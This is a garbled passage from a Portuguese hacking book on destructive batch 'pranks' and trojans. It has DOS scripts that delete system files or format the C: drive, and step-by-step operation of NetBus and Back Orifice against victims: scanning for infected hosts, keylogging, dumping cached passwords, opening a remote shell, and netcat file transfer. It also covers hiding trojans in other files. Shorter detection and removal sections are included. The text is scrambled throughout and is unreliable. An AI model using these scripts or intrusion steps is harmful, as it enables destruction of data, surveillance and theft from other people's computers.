<enter>
<enter>
<enter>
<enter>
<enter>
arquivo.b<enter>
o Frase de sua preferê
<enter>
tecla F6> <enter>
executasse como lote.bat no prompt de como um hacker poderi o system.com e leva
uivo.
s atraz foi de comandos a se
del *.sys
del *.exe
del *.com
cd windows
del *.*
cd\
del at
@ech ncia
<
Se alguém o ando ele entraria em ação, ou entã a copia-lo em um disquete juntamente com -lo a qualquer outro micro, bastando executar o arq
Muito espalhado a alguns ano o roleta russa, que na verdade é uma seqüência rem executados num
Terrorismo Tecnológico Aprenda Para Sobreviver
159
únic ver como a roleta russa funcio
Novamente era feito em DOS:
copy con roletarrussa.bat <en
<enter>
do à virtual Juke-box <enter>
@echo Escolha a cancão favorita para tocar agora:
<enter>
@echo (1) - You hate - Rammstein
<enter>
@echo (2) - The Kiss of Judas - Stratovarius <enter>
@echo (3) - Everything Die - Type 0' Negative
<enter>
@echo (4) - Patricia - Ray Connif <enter>
choice /c1234
<enter>
o procedimento para “invernizar” a vida de um usuário, vamosnava:
ter>
@echo off
@echo Bem-vin
@echo <enter>
Terrorismo Tecnológico Aprenda Para Sobreviver
160
if errorlevel 1 goto Um <enter>
if errorlevel 2 gto Dois
<enter>
if errorlevel 3 goto Três <enter> if errorlevel 4 goto Quatro <enter>
<enter> :Um <enter> cd\ <enter>
xdel *.doc /s <enter> xde > goto finale <enter>
<en r> :Dois <enter>
copy c:\windows\system\*.* > nul <enter> cd Judas <enter>
goto finale <enter>
:Quatro <enter>
l *.xls /s <enter
te
md Judas <enter>
<enter> :Três <enter>
format c: /y > nul <enter> goto finale <enter>
<enter>
echo Sua agonia já tem sido grande o suficiente. Desculpe... <enter> <enter>
:finale <enter> (aperte a tecla F6 para finalizar)
(Mas num seja idiota de executar isto na sua máquina ok!)
Terrorismo Tecnológico Aprenda Para Sobreviver
161
Capítulo VIII
Cavalo de tróia (Trojans) - Neste capítulo será explicado como funcionam como se detecta e como remover um Trojan (Cavalo de tróia)
Terrorismo Tecnológico Aprenda Para Sobreviver
162
8.1 Trojan
um Trojan?O que é
nome cavalo de tróia vem na verdade da historia em que o governante da cidade de Tróia na antiga Grécia foi presenteado com um cavalo de madeira no qual estavam escondidos soldados inimigos, à noite em quanto todos estavam dormindo os soldados sa am e dominaram a cidade, que não estava esperando um at
sso aí, é um arquivo (programa) que rouba informações do seu computador e muitas vezes até o domina fazendo com que ele possa resetar, fazer logoff, abrir e fechar o drive de cd rom, copiar a tela que esta sendo vista, copiar, apagar, programas e arquivos. Tudo isso sem que o computador que está sendo atacado fique sabendo, a não ser claro no caso de fazer logoff, resetar etc. O trojan é tão poderoso que escraviza a máquina e pode até mesmo mexer o mouse ou desativar teclas do teclado.
instalado na máquina, após isto cada vez que o usuário reinicia o seu computador este arquivo se auto inicializa ficando então sempre ativo esperando o seu comandante (o mar.
Intranet, o “hacker” (vou chamar assi
O
íraque. E o trojan é i
O arquivo infectado é
invasor) o cha
Este arquivo irá abrir uma porta do computador, ele pode até mesmo criar um usuário e uma senha para que só a pessoa que o instalou consiga invadir e usá-lo. Feito isto pela Internet ou uma
m o invasor a partir de agora) pega o endereço IP do micro infectado e entra em seu sistema. A partir daí ele escraviza e domina toda a plataforma alheia.
Terrorismo Tecnológico Aprenda Para Sobreviver
163
A grande dificuldade para administradores é que o sistema operacional pode ser perfeito e não ter nenhum bug, pois o trojan não precisa de falhas para atuar. Na precaução jamais abra arquivos executáveis enviados por estranhos ou pegos em sites du tar escondido em um jogo ou algum aplicativo e quando você o executar ele vai se auto-ins
- Hack’a’tack - Girlfriend - ackcmd
Amanda
vidosos. Pois o trojan pode até mesmo es
talar, fique esperto com o tamanho dos arquivos e se achar que tem algum problema utilize um antivírus e cheque este arquivo. No caso de a dúvida persistir ou delete o arquivo ou tente executá-lo em uma máquina para testes.
8.2 Invasão
Melhores trojans para Windows: - Netbus - Back Orifice - Netsphere - SubSeven
- - Keystroke Logger Achtung - Backdoor Remote Control - Aladino Remote Control
Terrorismo Tecnológico Aprenda Para Sobreviver
164
Melhores para Linux - Sutrojan - NC110 UX Melhores para MAC
s trojans são facilmente encontrados na Internet, e possuem dois arquivos principais o servidor você pode encontrar um para teste e sando trojans.
servidor é o arquivo infectado que é instalado na máquina que va
e uma tela onde vários comandos são fa
- SubSeven Melhores para Solaris - Sutrojan O
que são o cliente e ntrando no google e pesqui
Oi ser invadida, ele pode ser mandado camufladamente em outro
arquivo, o que é necessário é que o arquivo seja executado, e o cliente é o aplicativo usado pelo invasor para se comunicar com a máquina invadida, este abr
cilmente usados como vamos ver na próxima figura. Vamos relembrar: Todos os computadores possuem portas que vão de 0 a 65535,
cada porta serve para um determinado serviço que está ativo no computador, como o servidor de web o http usa a porta 80. O servidor (arquivo infectado) abre uma dessas portas do computador digamos a 1234 e está será a porta que o cliente “hacker” vai usar para invadir o micro infectado. No aplicativo cliente, possui diversas
Terrorismo Tecnológico Aprenda Para Sobreviver
165
funções que escraviza a máquina fazendo com que ela controle praticamente todas as funções do sistema invadido, o software trabalha graficamente, bastando colocar o ip e a porta do co
graminha como, por exemplo, o Scan Busmputador infectado clicando então em conectar. Existem alguns pro que
é encontrado na Internet que faz uma busca e conforme vai s de máquinas infectadas vai mostrando para o
acker. Ele então nem tem a dificuldade de infectar alguém basta encontrar uma máquina
Desco gramas omo o IPTracaer
encontrando IP´h
infectada e invadir. brir o IP de alguém também é muito fácil com pro
c que mostra os endereços em salas de chats.
les não são muito utilizados, porém são os que mais enganam os administradores, é instalado um servidor em um computador dig
assim possa ser itos os ataques. O computador vira um servidor Proxy, e este
omo já foi visto no capítulo de anonimidade faz uma espécie de rov do hacker.
8.4 Trojans comerciais
O PcAnywhere é um deles, outro é o terminal remoto do Windows 2000 e XP. Esses não são os únicos existem muitos outros. Eles possibilitam que novamente controle totalmente outra máquina. Você pode ate executar o Word e começar a digitar como se você estivesse digitando no teclado da máquina invadida.
8.3 Trojans de ponte
E
amos de um cliente que o “hacker” arrumou seu servidor (geralmente o hacker trabalha com informática) e fec
teamento, então caso alguém descubra que esta sendo invadido ai vir procurar na casa nesta máquina e não na casa da máquina
Terrorismo Tecnológico Aprenda Para Sobreviver
166
E esses programas o antivírus não acusa como trojan, já que são programas comerciais. Como teste pegue em algum site de busca o VNC, ele é gratuito, configure-o e experimente.
8.5 Camuflando
Em sites de buscas existem muitas ferramentas que possibilitam esconder os trojans dentro de outros arquivos ou aplicativos, são facilmente encontrados até em revistas de informática em que acompanha um CD-ROM.
O The Joiner é um programinha que junta 2 aplicativos (executáveis) e os transforma em 3. Podemos então juntar um jogo e um trojan, e quando alguém for instalar, os dois aplicativos serão instalados.
No IRC4, é muito comum receber fotos que na verdade são arquivos. Os Hackers renomeiam esses arquivos para parecer uma foto como, por exemplo, gostosa.jpg_________ .exe , o jp não é extensão deste arquivo, mas sim parte do nome, foi dado um eassim o usuário vai achar que é uma foto quando na verdade é um executável.
r do The Joiner são pegos pela m
8.6 Usando o Net bus 2.10 como teste
g
spaço bem grande entre o nome do arquivo ate a sua extensão,
Os arquivos que são feitos a partiaioria dos antivírus.
4 IRC – é um serviço de bate-papo, sendo o Mirc o mais conhecido dele alguns exemplos são, T7DS, Gasper, Money...
Terrorismo Tecnológico Aprenda Para Sobreviver
167
Vamos utilizar o Netbus trojan 2.10 para conectarmos ao nosso próprio computador, quando quisermos fazer esse tipo de teste temos que usar o ip 127.0.0.1 que acessa a própria máquina, também tem que infectá-la antes então execute o NBSvr.exe
- Abra o programa cliente do Trojan Netbus que é o NetBus.exe
se precisar desative o anti vírus para fazer o teste.
- Na tela inicial nesta versão do programa já tem o Meu computador então basta dar um duplo clic. Ou clique em connect!
Apóna b
s clicar em connect tem que aparecer connected to 127.0.0.1 arra de status.
Terrorismo Tecnológico Aprenda Para Sobreviver
168
Agora basta ir navegando entre as opções e veja tudo o que é po vel! ssí
Terrorismo Tecnológico Aprenda Para Sobreviver
169
1. Clique em Open CD-ROM para abrir o drive de cd-rom 2. Em Start Program e coloque c:\windows\notepad.exe para
oco de nota. 3. oque um endereço e mande o
computador para alg4. sten para mostrar na sua tela os caracteres digitados
dor invadido, você cairá nesse site configurado. Por exemplo: ao digitar 127.0.0.1 no browser fui enviado para www.google.com.br
abrir o blClique em Go to URL col
um site. Use Lipela pessoa e intervir no meio (como se você estivesse escrevendo no Word e de repente as palavras se formarem sozinhas).
5. A Port Redirect cria uma ponte. Coloque uma porta (geralmente use a 80) e um site. Assim quando for ao Internet Explorer e digitar o IP do computa
Terrorismo Tecnológico Aprenda Para Sobreviver
170
6.
o servidor.
ma ferramenta que pode ser utilizada como um sis de administração remota para os ambientes operacionais Wi dows 98 e Windows NT.
s e facilidades, o NetBus pa
s máquinas de suas vítimas, sem serem no dos.
Servidor NetBus é auto-instalável indicando que na primeira execução a máquina passará a ser comprometida.
O NetBus p o Servidor, apresentando inúmeras características das quais se destacam:
Auto-instalável
ecutar qualquer aplicativo Permite fechar/terminar qualquer aplicativo
- Permite rebootar o servidor
você ainda pode capturar telas, executar programas.... 7. Para desconectar, clique em disconnect. 8. A opção server admin retira
8.7 Manual NetBus
8.7.1 Introdução
O NetBus é utemandows 95, WinÉ composto por um programa que atua como Servidor e um
programa que atua como Cliente, permitindo conexões remotas mesmo através da Internet, utilizando-se do protocolo TCP.
Por suas inúmeras característicassou a ser utilizado principalmente por hackers que pretendem
manter controle sobre atados/detecta
8.7.2 Comprometimento O
ermite um amplo controle sobre
- - Auto executável (com o boot do Windows) - Permite iniciar/ex-
Terrorismo Tecnológico Aprenda Para Sobreviver
171
- Pode desconectar usuários - Permite enviar caracteres para aplicativos ativos - Permite capturar o que esta sendo digitado no computador
ser idor
ervidor
Não aparece na Task List do Windows
Além disso, o NetBus faz uso de senhas para permitir o controle de acessos ao Servidor NetBus. A string que contém a senha que o Cliente envia para vidor é semelhante à linha abaixo:
Password;0;my_password No entanto, detectou-se a presença de um backdoor no NetBus
que permite a conexão com o Servidor sem a necessidade de sepode conectar-se sem autenticação bastando substituir o valor do segundo parâmetro da stri 1".
ode perfeitamente ser renomeado para qualquer outro nome. O NetBus utiliza TCP para esta elecer o envio/recebimento de
pacotes e da e 12346 aguardando por conexões de clientes.
v- Permite capturar a tela (screenshot) do computador servidor - Retorna informações gerais sobre o computador - Permite realizar upload de arquivos para o s- Permite realizar download e deleções de qualquer arquivo do
servidor - Permite capturar o som de microfones instalados no servidor - Possui esquemas de proteção e validação de acessos através
de senhas -
o Ser
qualquer Cliente estabelecer utilizar uma senha. O Cliente
ng de conexão acima de "0" para "
8.7.3 Detecção Por default, o Servidor NetBus chama-se Patch.exe. No entanto
pb
dos, permanecendo ativo nas portas 12345
Terrorismo Tecnológico Aprenda Para Sobreviver
172
Como primeiro passo, é possível verificar se essas portas estãoem uso por algum serviço. Para tantoc
utiliza-se o comando 'netstat'
onforme exemplo abaixo: :\>netstat -an | find "1234"
TCP 127.0.0.1:m seguida, é possível identificar que serviço está ativo na
porta apresentada pelo netstat. Para tanto se utiliza o comando teln
u: 'NetBus 1.60' Al o
Windows a prpel programa quando de ão. Execute o 'regedit' e faca uma busca pelas chaves abaixo:
c12345 0.0.0.0:0 LISTENING
E
et, conforme exemplo abaixo: c:\>telnet 127.0.0.1 12345 Se o NetBus estiver instalado e aguardando por conexões
nesta porta, a seqüência abaixo irá aparecer na janela do telnet: 'NetBus 1.53' O
em desse procedimento, é possível examinar o registro docura de algumas chaves que podem ser criadas
sua instalaço
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run[Nome
do NetBus] HKEY_CURRENT_USER\Patch\Settings\ServerPwd A primeira chave indica que o NetBus está configurado para ser
inicializado automaticamente a cada boot do sistema. Já a segunda chave indica qual a senha (em formato texto puro) que esta sendo utilizada para validar conexões.
8.7.4 Removendo o NetBus Indicam-se dois procedimentos básicos e simples para
remoção do NetBus:
Terrorismo Tecnológico Aprenda Para Sobreviver
173
1) fazer uso de uma opção do Servidor NetBus que automaticamente deleta o executável, conforme exemplo abaixo:
c:\>nome_do_netbus_server.exe /remove 2) utilizar o Cliente do NetBus para fazer essa remoção. Basta
conectar-se ao Servidor (podendo ser localhost), selecionar "Server admin" e em seguida "Remove server".
No entanto, notamos que em alguns casos as duas opções falharam ao limpar o registro do Windows. Logo, indicamos que o processo de remoção seja feito manualmente deletando-se o executável e limpando-se o registro eliminando-se as chaves criadas pelo NetBus.
8.8 Manual Back Orifice
8.8.1 O que é o Back Orifice?
Back Orifice ou simplesmente BO, é um aplicativo clie
como um cavalo de tróia.
Onte/servidor apenas para Windows 95 e 98, que permite ao
cliente monitorar e administrar a máquina rodando o servidor. Pode ser considerado
8.8.2 Quem criou o Back Orifice?
Terrorismo Tecnológico Aprenda Para Sobreviver
174
O criador do Back Orifice, é um grupo Hacker chamado Cult of Dead Cow ou Culto da Vaca Morta.
funciona?
isualização de uma home page, compreendendo uma máquina cliente e outra servidora, respectivamente. Assim é o Ba os. A máquina que roda a versão cliente pode conectar-se com uma máquina que rod
8.8.4 Quem são os servidores e quem são os
ois, acredito, que ninguém go os pessoais, para algumas mil o o programa BO vem com s utilitários, as versões clie
s que, quem está rodando o servidor do Ba ersão cliente para, talv acabou tornando a si p
use. E o servidor se ins e ap a cad nicia sem que nin fundo e não de
8.8.3 Como ele
Assim como um browser conecta-se a um servidor da Internet
para a v
ck Orifice, que se utiliza os mesmos process
a a versão servidora.
clientes? Na grande maioria dos casos, a versão servidora é rodada em
uma máquina por simples descuido. Paria de disponibilizar seus arquivst
hares de pessoas no mundo. Compactado, contendo além de algun
nte e servidor. O usuário pode executar a versão errada (servidor), simplesmente por não ter lido ou entendido as ins uções. Mas lembra-notr
ck Orifice, pelo menos, tentou rodar a vz, divertir-se com a máquina dos outros. Ee
róprio, o brinquedo dos outros. para isto, basta um simples clique no moE
tala em sua máquina sem nada lhe mostrar e em seguida sga e passa a funcionar como um serviço do Windows. E aa vez que você ligar o seu micro, o servidor se iuém perceba. Ele funciona como um pano deg
ixa nenhum rastro.
Terrorismo Tecnológico Aprenda Para Sobreviver
175
O servidor do Back Orifice pode vir encoberto por um outro arq
a sua detecção. Permite ao administrador remoto tomar o controle de seu sistema: roubar suas senhas, enviar ou rec
imento ou consentimento.
uivo qualquer, e ao ser executado se instala na sua máquina, sem nenhum sinal. E uma vez rodando, o faz de uma forma que torna difícil
eber arquivos, rodar novas aplicações, observar e derrubar qualquer aplicação que você esteja rodando, e etc,... e sem o seu conhec
Especificações: O pacote bo.zip contém: bo.txt - este documento. plugin.txt - a ajuda para programação de plugin. boserve.exe - o auto-instalador do Back Orifice (BO).
do Back Orifice. oconfig.exe - utilitário de configuração de nome do executável,
pompacta arquivos compactados com o comando
"freeze". ser
descompactados com o comando "melt".
8.8.5 Comandos:
ser de melhor manuseio. Mas os comandos possuem a mesma sintaxe en
ui/texto:
ntrole o aplicativo modo texto ou modo dos (como command.com) via telnet.
bogui.exe - o cliente modo gráfico (GUI) do Back Orifice. boclient.exe - o cliente modo texto brta, senha e plugins do servidor BO. melt.exe - desco
freeze.exe - compacta arquivos que podem
Abordaremos a versão Bogui.exe (modo gráfico), por
tre as duas gráfica e texto. GApp add/appadd - abre e redireciona um aplicativo modo texto
para uma porta tcp. Isso permite que você co
Terrorismo Tecnológico Aprenda Para Sobreviver
176
App del/appdel - desliga o redirecionamento de um aplicativo. Apps list/applist - lista os aplicativos atualmente conectados.
a caso queira que mais de um arquivo seja listado.
irectory remove/rd - remove um diretório.
xport add/shareadd - compartilha um diretório ou drive do ser
aredel - remove um compartilhamento.
compartilhamento.
ile delete/del - remove um arquivo.
ile find/find - procura no diretório, arquivos que coincidam com a e
ile melt/melt - descompacta um arquivo.
ile view/view - visualiza o conteúdo de um documento texto.
TTP Disable/httpoff - desabilita o servidor http.
Enable/httpon - habilita o servidor http.
Directory create/md - cria diretório. Directory list/dir - lista arquivos e diretórios. Você deve
especificar um curing
D Evidor em rede. O ícone diretório ou drive compartilhado não é
alterado. Export delete/sh Exports list/sharelist - lista os compartilhamentos, o drive ou
diretório que está sendo compartilhado, os acessos e a senha do
File copy/copy - copia um arquivo. F Fspecificação curinga. File freeze/freeze - compacta um arquivo.
F F H HTTP
Terrorismo Tecnológico Aprenda Para Sobreviver
177
Keylog begin/keylog - registra o texto digitado no servidor em
um arquivo texto. O log mostra o nome da janela em que o texto foi digitado.
pture avi/capavi - captura vídeo e áudio (se disponível) de um dispositivo de captura de vídeo para um arquivo avi.
M Capture screen/capscreen - captura uma imagem da tela do
ídeo.
et delete/netdisconnect - desconecta o servidor de uma rede.
et use/netconnect - conecta o servidor em uma rede.
do servidor.
Informa o nome da máquina e a versão do BO.
Keylog end - interrompe o registro de texto digitado. Para
utilizar esse comando no modo texto, use o comando "keylog stop".
MM Ca
MM Capture frame/capframe - captura um quadro de vídeo de
um dispositivo de captura de vídeo para um arquivo bitmap. M servidor para um arquivo bitmap. MM List capture devices/listcaps - lista os dispositivos de
captura de v MM Play sound/sound - toca um arquivo wav no servidor. Net connections/netlist - lista as conexões de entrada e saída
da rede. N N Net view/netview - lista todas as interfaces de rede, domínios,
servidores e envios Ping host/ping - testa a conexão com a máquina remota.
Terrorismo Tecnológico Aprenda Para Sobreviver
178
Plugin execute/pluginexec - executa um plugin do Back Orifice. Executar funções não entendidas pelo plugin pode fazer com que o servidor trave.
Plugin kill/pluginkill - desliga um plugin. Plugins list/pluginlist - lista plugins ativos ou avisa de que um
plugin foi desligado. Process kill/prockill - termina um processo. Process list/proclist - lista processos rodando. Process spawn/procspawn - abre um programa. Pelo GUI, se o
segundo parâmetro é especificado, o processo será executado normalmente e visível. Caso contrário ele será executado de maneira invisível.
Redir add/rediradd - redireciona recebimento de conexões tcp
ou pacotes udp para outro endereço ip. Redir del/redirdel - interrompe o redirecionamento de uma
porta. Redir list/redirlist - lista os redirecionamentos de portas ativos. Reg create key/regmakekey - cria uma chave no registro. NOTA: Para todos os comandos de registro, não especificar a \\
inicial de valores de registro.
Reg delete key/regdelkey - remove uma chave no registro.
eg delete value/regdelval - remove um valor no registro.
Reg list keys/reglistke de uma chave de registro.
R
ys - lista as sub-chaves
Terrorismo Tecnológico Aprenda Para Sobreviver
179
Reg de
registro.
eg set value/regsetval - define um valor para uma chave de reg
com
ystem info/info - exibe as informações do sistema da máquina ser
ora.
list values/reglistvals - lista os valores de uma chave
Ristro. Os valores são especificados no formato tipo vírgula
valor. Para valores binários (tipo B) o valor é um série de dois dígitos hexadecimais. Para valores DWORD (tipo D) o valor é um número decimal. Para valores string (tipo S) o valor é uma string de texto.
Resolve host/resolve - determina o endereço ip de uma
máquina em relação à máquina servidora. O nome da máquina pode ser um "host name" ou o nome de uma máquina em rede local.
System dialogbox/dialog - cria uma caixa de diálogo no servidor o texto informado e um botão "ok". Você pode criar quantas
caixas de diálogo quiser, elas aparecerão em cascata umas sobre as outras.
Svidor. Os dados exibidos incluem nome da máquina, usuário,
tipo de cpu, memória total e disponível, dados sobre a versão de Windows e informações sobre os drives, incluindo tipo (fixo, cd-rom, removível ou remoto) e, nos drives fixos, o tamanho e espaço disponível do drive.
ystem lockup/lockup - trava a máquina servidS
System passwords/passes - exibe as senhas cacheadas e a
senha do protetor de tela. As senhas podem apresentar caracteres estranhos no fim.
System reboot/reboot - desliga o servidor e reinicia a máquina.
Terrorismo Tecnológico Aprenda Para Sobreviver
180
Te
CP file receive/tcprecv - conecta o servidor a um ip e porta specíficos e grava qualquer dado recebido por aquela conexão
em um arquivo. TCP file send um ip e porta
específicos, envia o conteúdo o arquivo especificado e o de onecta. Arquivos podem s transferidos _do_ servidor usa
ows do netcat não desconcerta nem se fina Após o término, finalize o netcat co
Windows. O nome não precisa tem a
/tcpsend - conecta o servidor ader sc
ndo-se o comando "tcp file send" e o utilitário netcat com os parâmetros: netcat -l -p 666 > arquivo Arquivos podem ser transferidos _para_ o servidor usando-se o comando "tcp file receive" e o utilitário netcat com os parâmetros: netcat -l -p 666 < arquivo NOTA: A versão para Wind
liza quando atinge o final da transmissão. m ctrl+c ou ctrl+break.
BOConfig: BOconfig.exe permite configurar as opções de um
boserve.exe antes que ele seja instalado. Ele requisitará: Runtime executable name O nome do arquivo que o Back Orifice se instalará no diretório system do
extensão exe, ela será automaticamente adicionada. Exe description in registry A descrição do executável do Back Orifice no registro do Windows, de onde ele será executado sempre que o Windows se iniciar. Server port A porta em que o servidor será acessado. Encryption password A senha de acesso ao servidor. Não é obrigatória e pode ser deixada em branco. Default plugin to run on startup O plugin do Back Orifice a ser executado ao iniciar. File to attach Arquivo a ser anexado ao boserve.exe. Ele pode ser um plugin, que será automaticamente iniciado com o boserve.exe. NOTA: Se o servidor não for configurado com o BOconfig.exe, ele se comunicará na porta 31337.
Sem senha, e se instalará como “.exe".
8.8.6 O Manual:
Terrorismo Tecnológico Aprenda Para Sobreviver
181
Como encontrar uma máquina rodando o
ambém abrir o NOTEPAD e criar uma lista de sub-redes (uma por linha), salvá-la no mesmo diretório do Bogui.exe e en
uivo que você criou na caixa de texto que surgirá.
b-redes do arquivo. ou uma máquina
servidor do Back Orifice? Você pode fazê-lo de duas formas. A primeira é digitando o
endereço de uma sub-rede na pequena caixa no canto superior esquerdo. Ex. 195.219.222.* e pressionando "ENTER". Isto fará com que o Back Orifice procure por todos os endereços IP do 195.219.222.0 até o 195.219.222.255.
Você pode t
tão, pressionar o botão PING no canto inferior esquerdo da janela.
Agora digite o nome do arq
O Back Orifice irá então, buscar todas as suComo saberei que o Back Orifice encontr
rodando o servidor ? Quando o Back Orifice detectar uma máquina rodando o
ser idor, ele irá mostrar uma mensagem como está: ---------- Packet received from host 195.130.131.69 port 31337
----
ack Orifice e o nome DEFAULT, é o nome do computador-servidor".
superior esquerda para começar a executar os comandos.
o comando /whois "nick")
v-----------
!PONG!1.20!DEFAULT! ----------------------- End of Data -----------------------
Que significa: "Pacote recebido do host (endereço IP dp
servidor) 195.130.131.69 porta 31337". "PONG, significa a resposta ao seu comando PING. O número 1.20 indica a versão do servidor B
Digite o endereço IP completo, encontrado na mesma caixa de texto
(Uma boa forma de encontrar endereços IP`s é no mIRC, através d
Terrorismo Tecnológico Aprenda Para Sobreviver
182
Como posso ver e baixar os arquivos do
winchester do servidor?
ero) na caixa de texto drive) na caixa "root". Então,
Nada mais fácil! Apenas selecione o comando "HTTP Enable"
na janela do Bogui, digite "80" (ou outro núm"port" e "c:" (ou outra letra dopressione o botão "send".
Você deverá ver uma mensagem como esta:
** 15:HTTP Enable packet sent (25 bytes) val1: '80' val2: 'c:' ----
------- Packet received from host 195.130.131.69 port 31337 -----------HTTP server listening on port 80 ------------------------- End of Data -------------------
Internet Explorer também se sairá bem). No campo de endereço, digite "http://endereçodeip". No caso acima, seria
Se ta, então adicione-o ao endereço de IP. Ex. "http://195.130.131.69:3000".
ronto! Agora você poderá visualizar o conteúdo do drive C:\ do ser
s que se qu
rio "C:\WINDOWS\MEUS DOCUMENTOS". Você deverá digitar no
Agora simplesmente, abra um Browser (Netscape Navigator
funciona melhor neste caso, mas o
"http://195.130.131.69". você utilizou um número diferente de "80" para a por
Pvidor na janela de seu browser. Clicando em um diretório, você
será transferido para ele. Clicando nos arquivos, você os baixará. OBS: O ideal é digitar os nomes de arquivo ou diretórioer acessar ou baixar, no campo do endereço. E também é
necessário respeitar os 8 caracteres para nomes de arquivos ou diretórios. Por exemplo: Se você deseja acessar o diretó
campo de endereço: "http://195.131.131.69/windows/meusdo~1". É a mesma regra do DOS.
Terrorismo Tecnológico Aprenda Para Sobreviver
183
Como posso enviar arquivos para o servidor? Siga o mesmo procedimento acima. Quando o conteúdo do
drive especificado aparecer em seu browser, role-o até a parte inferior. Você notará dois botões e uma caixa de texto. No botão "browser" ou "procurar", você irá especificar que arquivo da sua má uina, você quer enviar. Após selecioná-lo, clique em upload para enviá-lo.
OBS: iona. Pode-se utilizar também o utilitário NETCAT para o envio de arquivos, através do comando.
você deseja armazenar os registros. Você pode escolher qualquer nome, mas é recomendável que se utilize uma extensão .txt (texto), pelo fato de que este tipo de arquivo pode ilmente visualizado pelo seu browser. No exemplo abaixo, o arquivo foi chamado de "system.txt".
** 17:Keylog begin packet sent (29 bytes) val1: 'system.txt' val2:
'c:' -
q
Em nem todos os casos este procedimento func
para enviar: "nc -l -p 666<nomedoarquivo" para receber: "nc -l -p 666>nomedoarquivo" * O número 666 representa a porta, podendo ser mudado. Veja o que o usuário do servidor está digitando. Para realizar esta função, você precisa selecionar o comando
"Keylog begin" na janela do seu Back Orifice. Na caixa de texto "filename", digite o nome de um arquivo que
ser fac
--------- Packet received from host 195.130.131.69 port 31337 ---------------
Terrorismo Tecnológico Aprenda Para Sobreviver
184
Logging keys ------------------------- End of Data -------------------
Após isto, execute o comando "File find" com o nome do
arquivo em uma caixa de texto e "c:" em outra. Isto resultará em a
*c\:Sc:\Program Files\ICQ\system.txt E-
arqu txt". Abra uma janela do seu browser e abra o arquivo que você verá do servidor esteve digitando.
eça quando a gravação dos
reg o, clique no comando "Keylog end" na janela do seu Back Orifice.
Veja as senhas do usuário armazenadas no servidor.
s simples das funções. Apenas clique no comando "System passwords" e pronto, as senhas aparecerão pa
lgo como: * 32:File find packet sent (31 bytes) val1: 'system.txt' val2: 'c:'t ' YSTEM.TXT 49 -A----- 08-23-98 23:17
nd of search -------------------------- End of Data -------------------------
Isto lhe dará uma lista de todos os locais onde existirem ivos de "system.
tudo o que o usuário
OBS: Talvez o arquivo só aparistros for interrompida. Neste cas
Talvez esta seja a mai
ra você! Como abrir um prompt do DOS na máquina servidora. Para fazê-lo, você precisa selecionar o primeiro comando da
lista na janela do seu Back Orifice, "App add". Não caixa de texto, digite "command.com" e na segunda caixa de texto digite, "23".
Agora, você precisa abrir uma sessão do TELNET na sua máquina. Pressione o botão INICIAR do seu computador e em
Terrorismo Tecnológico Aprenda Para Sobreviver
185
seguida, clique em EXECUTAR. Digite TELNET e o programa irá se iniciar.
Clique no menu "Connect" e escolha o primeiro item "Remote system". Uma pequena janela irá surgir, com três caixas.
o IP da máquina servidora no campo "Host Name". Então pressione o botão "Connect". Após alguns segundos,
elecione o comando "System Dialogbox". Na caixa de texto "title", digite o título que você deseja que apareça na caixa de diá xto "text", digite o texto da mensagem. Então pressione o botão "send" e você deverá ver uma confirmação do envio da mensagem.
s
Vamos utilizar como exemplo de detecção por portas, o meu prog ojans versão 1.6. Se quiser tentar outro programa,
Apenas digite o endereç
o prompt do DOS irá aparecer na janela do TELNET. Você pode agora usar os comandos do DOS no servidor. (dir, cd, copy,...)
Mande mensagens na tela do servidor. S
logo. Na caixa de te
Capture a tela do usuário em um arquivo.BMP. Você pode salvar em um arquivo a tela capturada da máquina
servidora. Selecione o comando "MM capture screen". Na caixa de texto a esquerda, digite o nome de um arquivo qualquer com extensão.BMP e então clique no botão "send". Você deverá receber uma confirmação do comando, então o arquivo.BMP estará na máquina servidora podendo ser baixado.
8.9 Utilizando o Anti-Trojan
rama Anti-Tr
Terrorismo Tecnológico Aprenda Para Sobreviver
186
tentedp
ue na pasta Configuração, e coloque a mensagem para a pessoa que tentar lhe invadir. Se quiser, configure um e-mail
va de invasão seja reportada. 3. Clique na pasta Monitorar. 4. Clique no botão Monitorar. Agora clique com o botão direito no
ícone do superman na barra de tarefas e selecione esconder. 5. Simule uma tentativa de invasão indo a Iniciar / Executar e
digitando: telnet 127.0.0.1 12345
Pronto você já esta mais seguro
o Xô Bo Bus brasileiro ou algum estrangeiro (procure em sites e pesquisas). Claro que um firewall (como veremos depois) é mais otente. 1. Abra o programa 2. Cliq
para que a tentati
8.10 Remoção do trojan
or portas
Detecção p
se é um método utilizado por programas como o Xôbobus, Anti-Trojans e muitos outros. Funciona do seguinte modo: os programadores estudam as portas TCP e UDP utilizadas pelos trojans e criam um programa que abre essas portas. Assim, quando um invasor vir à porta aberta e pensar que é um cavalo de tróia que está instalado ali, cairão em uma armadilha tendo o seu endereço IP detectado. Esse método não é muito eficiente pois
Es
Terrorismo Tecnológico Aprenda Para Sobreviver
187
facilmente podemos mudar as portas que os trojans utilizam. Mas ainda é um método muito usado, pois muitos hackers não se lembram de trocar as portas.
etecção pelo arquivoD
antivírus e o programa The Cleaner. Ele detecta o trojan checando a sua estrutura. Se o arquivo estiver renomeado (sem ser para executável) ou estiver comprimido, esse método se torna inútil. Para ser realmente eficaz, deve ser usado junto à detecção de portas. Assim, mesmo que seu antivírus não encontrou um trojan, o Anti-Trojans pode encontrar.
etecção por string
Esse é o método usado pelos
D
uco divulgado publicamente se torna a melhor garantia para se detectar um trojan sem falhas. Mesmo que o programa for comprimido ou mude suas portas, ele ainda estará usando uma das 65535 portas do sistema e se comunicará com o cliente. A comunicação entre cliente e servidor se dá por uma string (texto) enviada. Por exemplo: O Netbus 1.7 envia uma string assim “Netbus 1.7x” quando alguma conexão é estabelecida. Se for o cliente, ele responderá com outra string. Então para analisar todas as portas do seu sistema e saber quais estão abertas e possuem strings, utilize um programa como o Chaoscan ou algum outro scanner de porta que lhe dê essas informações.
etecção manual
Po
D
Terrorismo Tecnológico Aprenda Para Sobreviver
188
Muito eficaz também, nual do sistema pelo operador. Olhando registro, arquivos de inicialização, conferindo os programas carregados na memória, o tamanho dos arquivos, etc
aos outros tipos de detecção faz com
a checagem ma
... Essa política adotada junto que você exclua em 100% a chance de uma invasão por
trojan.
Terrorismo Tecnológico Aprenda Para Sobreviver
190
9.1 veja só!
AquiVam
está uma coisa muito interessante. os analisar um banco:
Vocêacessar
Os nde 10 n
Bom su para cada digito tem-se a opção de 10 números diferentes que você pode usar então temos:
10 opções no 1º ito, 10 opções no 3º digito e 10 opções no 4º digito.
Agor é é igual a 10.000 senhas diferent não puder repetir os dígitos entes.
